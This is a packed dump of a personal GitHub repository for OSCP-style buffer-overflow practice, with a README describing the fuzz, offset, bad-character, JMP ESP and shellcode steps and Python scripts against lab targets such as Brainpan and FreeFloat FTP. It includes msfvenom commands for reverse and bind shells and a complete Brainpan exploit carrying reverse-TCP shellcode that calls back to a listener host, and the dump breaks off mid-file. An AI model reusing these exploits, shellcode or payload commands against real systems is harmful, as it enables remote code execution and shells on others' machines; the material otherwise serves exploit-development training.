├── README.md ├── brainpan ├── brainpan.exe ├── brainpan.py ├── finalexploit.py ├── offsetcalc.py └── offsetverify.py ├── fftpwin7 ├── fftp1.py ├── fftp2.py └── fftpbadchars.py ├── freefloatftp ├── ffftp.py ├── ffftp2.py └── ffftp3.py ├── minishare ├── minisharefive.py ├── minisharefour.py ├── minishareone.py ├── minisharethree.py └── minisharetwo.py ├── minisharewin7 ├── fuzzer.py ├── minishare.py ├── minisharebadchars.py ├── minisharesploit.py └── minishareverifyoffset.py ├── quickftppro └── qttftp.py ├── savant ├── savant1.py └── savant2.py ├── second ├── brainpan │ ├── badchars.py │ ├── bpfuzz.py │ ├── offsetcalc.py │ └── retaddress.py ├── freefloatftp │ ├── fftp1.py │ ├── fftp2.py │ ├── fftp3.py │ ├── fftp4.py │ └── fftp5.py ├── minishare │ ├── minisharefive.py │ ├── minisharefour.py │ ├── minishareone.py │ ├── minisharethree.py │ └── minisharetwo.py ├── slmail │ ├── badchars.py │ ├── exploit.py │ ├── fuzzer.py │ ├── offsetcalc.py │ ├── slmail.exe │ └── verifyoffset.py └── warftp │ ├── badchars.py │ ├── exploit.py │ ├── fuzzer.py │ ├── offsetverify.py │ ├── ret.py │ ├── retsploit.py │ └── retverify.py ├── server-strcpy ├── Server-Strcpy.exe ├── serverstrcpy.py ├── serverstrcpy2.py ├── serverstrcpy3.py ├── serverstrcpy4.py └── serverstrcpy5.py ├── simplewebserver ├── 142ba80cfca8f99ac36c92535728844c-sws-2.2-rc2-i686.exe ├── fuzzer.py ├── offsetcalculate.py ├── simplewebserver.exe └── usingretshellcode.py ├── slmail ├── badchars.py ├── eipoverwrite.py ├── fuzzer.py ├── jmpesp.py └── jmpesp2.py ├── warftp ├── ftpexploit.py ├── ftpexploitbreakpoint.py ├── ftpexploitbreakpointjumpesp.py ├── ftpexploitbreakpointjumpesp.py.save ├── ftpexploitbreakpointjumpespsecondgo.py ├── ftpexploitbreakpointjumpespthirdgo.py ├── ftpexploitshell.py └── ftpexploitverifybreakpoint.py └── win7PCman ├── pcman1.py ├── pcman2.py ├── pcman3.py └── pcman4.py /README.md: -------------------------------------------------------------------------------- 1 | # Buffer-Overflow-Exploit-Development-Practice 2 | 3 | So the basic principle of this is, download the vulnerable software from the internet and run it on a virtual machine. Then you can practice exploit development versus those machines. My staged python development for these exploits may help you if you are a little confused at points. 4 | 5 | (this may be super helpful for oscp exam) 6 | 7 | 8 | 9 | 10 | The steps i typically follow are : 11 | 12 | process: 13 | 14 | 1.crash 15 | 16 | 17 | 18 | (AAAAAA) 19 | 20 | 2. find offset 21 | 22 | 23 | 24 | pattern_create 25 | 26 | 3. verify offset 27 | 28 | 4. check for badchars 29 | 30 | 31 | 32 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" +"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" +"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" +"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" +"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" +"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" +"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" +"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" +"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" +"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" +"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" +"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" +"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" +"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" +"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" +"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) 33 | 34 | badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 35 | 36 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 37 | 38 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 39 | 40 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 41 | 42 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 43 | 44 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 45 | 46 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 47 | 48 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 49 | 50 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 51 | 52 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 53 | 54 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 55 | 56 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 57 | 58 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 59 | 60 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 61 | 62 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 63 | 64 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 65 | 66 | 5. find location of a jump esp 67 | 68 | verifying jmp esp: 69 | 70 | Let’s verify that this instruction will work. We need to build an exploit buffer thatwill allow us to see if the instruction succeeded. But we need an easy way to stop theapplication so that we can see if it worked. One way to do this is to use the softwareinterrupt assembly command, which is INT 3. The hex value for this command is0xCC. By putting 0xCC instead of our character C in the exploit buffer, we make theprogram stop and we should see a bunch of INT 3 commands in our instructionwindow if the JMP ESP command works. 71 | 72 | hostname = sys.argv[1]jmpesp = "\x1c\x80\xf5\x77"username = "A"*485 + jmpesp + "\xcc"*(1024 - 485 - 4) 73 | 74 | 7. generate and write shellcode 75 | 76 | msfvenom -a x86 --platform windows/linux -p something/shell/reverse_tcp lhost=x.x.x.x lport=53 -f exe/elf/python/perl/php -o filename 77 | 78 | root@kali:~/bof/server-strcpy# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp EXITFUNC=thread -f c -b "\x00\x0a\x0d" -v shellcode 79 | 80 | root@kali:~/bof/minishare# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp lhost=11.11.11.2 lport=53 -f c -b "\x00\x0a\x0d" -v shellcode 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | Completed exploits on WinXP SP3: 89 | -freefloatftp 90 | -minishare 91 | -warftp 92 | 93 | win7: 94 | -slmail 95 | -(tried simplewebserver2.2 but failed miserably, one for osce preparation i think) 96 | -brainpan 97 | -(can't find a jmp esp without aslr on false) 98 | -(can't find a jmp esp without aslr) - fast ftp 99 | -PCMAN ftp, probably aslr, if not who cares 100 | 101 | I will explain these when i find the time or motivation 102 | 103 | todo: 104 | -savant 105 | -other windows 7 sploits 106 | 107 | -------------------------------------------------------------------------------- /brainpan/brainpan.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/ef3426ace0f4c4fc9fce612eba811a9c8988bb66/brainpan/brainpan.exe -------------------------------------------------------------------------------- /brainpan/brainpan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | # create an array of buffers, while increasing them. 4 | buffer=["A"] 5 | counter = 100 6 | while len(buffer) <= 30: 7 | buffer.append("A"*counter) 8 | counter = counter + 200 9 | for string in buffer: 10 | print "Fuzzing PASS with %s bytes" % len(string) 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | connect = s.connect(('11.11.11.7',9999)) 13 | s.recv(1024) 14 | s.send(string + '\r\n') 15 | s.close() 16 | -------------------------------------------------------------------------------- /brainpan/finalexploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | #root@kali:/usr/share/metasploit-framework/tools/exploit# msfvenom -p windows/shell_reverse_tcp LHOST=11.11.11.2 LPORT=4444 -b ‘\x00\x0a\x0d’ -f python -v shellcode 5 | 6 | shellcode = "\x90" * 16 7 | shellcode += "\xda\xd0\xbe\x57\xda\x9d\xd9\xd9\x74\x24\xf4\x58" 8 | shellcode += "\x31\xc9\xb1\x52\x31\x70\x17\x03\x70\x17\x83\x97" 9 | shellcode += "\xde\x7f\x2c\xeb\x37\xfd\xcf\x13\xc8\x62\x59\xf6" 10 | shellcode += "\xf9\xa2\x3d\x73\xa9\x12\x35\xd1\x46\xd8\x1b\xc1" 11 | shellcode += "\xdd\xac\xb3\xe6\x56\x1a\xe2\xc9\x67\x37\xd6\x48" 12 | shellcode += "\xe4\x4a\x0b\xaa\xd5\x84\x5e\xab\x12\xf8\x93\xf9" 13 | shellcode += "\xcb\x76\x01\xed\x78\xc2\x9a\x86\x33\xc2\x9a\x7b" 14 | shellcode += "\x83\xe5\x8b\x2a\x9f\xbf\x0b\xcd\x4c\xb4\x05\xd5" 15 | shellcode += "\x91\xf1\xdc\x6e\x61\x8d\xde\xa6\xbb\x6e\x4c\x87" 16 | shellcode += "\x73\x9d\x8c\xc0\xb4\x7e\xfb\x38\xc7\x03\xfc\xff" 17 | shellcode += "\xb5\xdf\x89\x1b\x1d\xab\x2a\xc7\x9f\x78\xac\x8c" 18 | shellcode += "\xac\x35\xba\xca\xb0\xc8\x6f\x61\xcc\x41\x8e\xa5" 19 | shellcode += "\x44\x11\xb5\x61\x0c\xc1\xd4\x30\xe8\xa4\xe9\x22" 20 | shellcode += "\x53\x18\x4c\x29\x7e\x4d\xfd\x70\x17\xa2\xcc\x8a" 21 | shellcode += "\xe7\xac\x47\xf9\xd5\x73\xfc\x95\x55\xfb\xda\x62" 22 | shellcode += "\x99\xd6\x9b\xfc\x64\xd9\xdb\xd5\xa2\x8d\x8b\x4d" 23 | shellcode += "\x02\xae\x47\x8d\xab\x7b\xc7\xdd\x03\xd4\xa8\x8d" 24 | shellcode += "\xe3\x84\x40\xc7\xeb\xfb\x71\xe8\x21\x94\x18\x13" 25 | shellcode += "\xa2\x90\xd7\x10\x30\xcf\xe5\x26\x25\x53\x63\xc0" 26 | shellcode += "\x2f\x7b\x25\x5b\xd8\xe2\x6c\x17\x79\xea\xba\x52" 27 | shellcode += "\xb9\x60\x49\xa3\x74\x81\x24\xb7\xe1\x61\x73\xe5" 28 | shellcode += "\xa4\x7e\xa9\x81\x2b\xec\x36\x51\x25\x0d\xe1\x06" 29 | shellcode += "\x62\xe3\xf8\xc2\x9e\x5a\x53\xf0\x62\x3a\x9c\xb0" 30 | shellcode += "\xb8\xff\x23\x39\x4c\xbb\x07\x29\x88\x44\x0c\x1d" 31 | shellcode += "\x44\x13\xda\xcb\x22\xcd\xac\xa5\xfc\xa2\x66\x21" 32 | shellcode += "\x78\x89\xb8\x37\x85\xc4\x4e\xd7\x34\xb1\x16\xe8" 33 | shellcode += "\xf9\x55\x9f\x91\xe7\xc5\x60\x48\xac\xf6\x2a\xd0" 34 | shellcode += "\x85\x9e\xf2\x81\x97\xc2\x04\x7c\xdb\xfa\x86\x74" 35 | shellcode += "\xa4\xf8\x97\xfd\xa1\x45\x10\xee\xdb\xd6\xf5\x10" 36 | shellcode += "\x4f\xd6\xdf" 37 | 38 | buffer = "A"*524 + "\xf3\x12\x17\x31" + shellcode 39 | 40 | try: 41 | print "\sending evil buffer..." 42 | s.connect(('11.11.11.7',9999)) 43 | data = s.recv(1024) 44 | s.send(buffer + '\r\n') 45 | print "\nDone!" 46 | 47 | except: 48 | print "Count not connect to Brain!" 49 | -------------------------------------------------------------------------------- /brainpan/offsetcalc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax' 6 | 7 | try: 8 | print "sending evil buffer..." 9 | s.connect(('11.11.11.7',9999)) 10 | data = s.recv(1024) 11 | s.send(buffer + '\r\n') 12 | print "\nDone!" 13 | 14 | except: 15 | print "Count not connect to Brain!" 16 | -------------------------------------------------------------------------------- /brainpan/offsetverify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | buffer = "A"*524 + "\xf3\x12\x17\x31" + shellcode 6 | 7 | try: 8 | print "\sending evil buffer..." 9 | s.connect(('11.11.11.7',9999)) 10 | data = s.recv(1024) 11 | s.send(buffer + '\r\n') 12 | print "\nDone!" 13 | 14 | except: 15 | print "Count not connect to Brain!" 16 | -------------------------------------------------------------------------------- /fftpwin7/fftp1.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | #evil = "A"*1000 6 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 7 | connect=s.connect(('11.11.11.9',21)) 8 | s.recv(1024) 9 | s.send('USER anonymous\r\n') 10 | s.recv(1024) 11 | s.send('PASS anonymous\r\n') 12 | s.recv(1024) 13 | s.send('MKD ' + evil + '\r\n') 14 | s.recv(1024) 15 | s.send('QUIT\r\n') 16 | s.close 17 | 18 | -------------------------------------------------------------------------------- /fftpwin7/fftp2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" + 7 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" + 8 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" + 9 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" + 10 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" + 11 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" + 12 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" + 13 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" + 14 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" + 15 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" + 16 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" + 17 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" + 18 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" + 19 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" + 20 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" + 21 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 22 | #offset is 247 23 | evil = "A"*247 + badchars 24 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | connect=s.connect(('11.11.11.9',21)) 26 | s.recv(1024) 27 | s.send('USER anonymous\r\n') 28 | s.recv(1024) 29 | s.send('PASS anonymous\r\n') 30 | s.recv(1024) 31 | s.send('MKD ' + evil + '\r\n') 32 | s.recv(1024) 33 | s.send('QUIT\r\n') 34 | s.close 35 | 36 | -------------------------------------------------------------------------------- /fftpwin7/fftpbadchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | #evil = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 5 | 6 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" + 7 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" + 8 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" + 9 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" + 10 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" + 11 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" + 12 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" + 13 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" + 14 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" + 15 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" + 16 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" + 17 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" + 18 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" + 19 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" + 20 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" + 21 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 22 | #offset is 247 23 | evil = "A"*247 + badchars 24 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 25 | connect=s.connect(('11.11.11.9',21)) 26 | s.recv(1024) 27 | s.send('USER anonymous\r\n') 28 | s.recv(1024) 29 | s.send('PASS anonymous\r\n') 30 | s.recv(1024) 31 | s.send('MKD ' + evil + '\r\n') 32 | s.recv(1024) 33 | s.send('QUIT\r\n') 34 | s.close 35 | 36 | -------------------------------------------------------------------------------- /freefloatftp/ffftp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | 5 | evil = "A"*1000 6 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 7 | connect=s.connect(('11.11.11.6',21)) 8 | s.recv(1024) 9 | s.send('USER anonymous\r\n') 10 | s.recv(1024) 11 | s.send('PASS anonymous\r\n') 12 | s.recv(1024) 13 | s.send('MKD ' + evil + '\r\n') 14 | s.recv(1024) 15 | s.send('QUIT\r\n') 16 | s.close 17 | -------------------------------------------------------------------------------- /freefloatftp/ffftp2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import sys 4 | 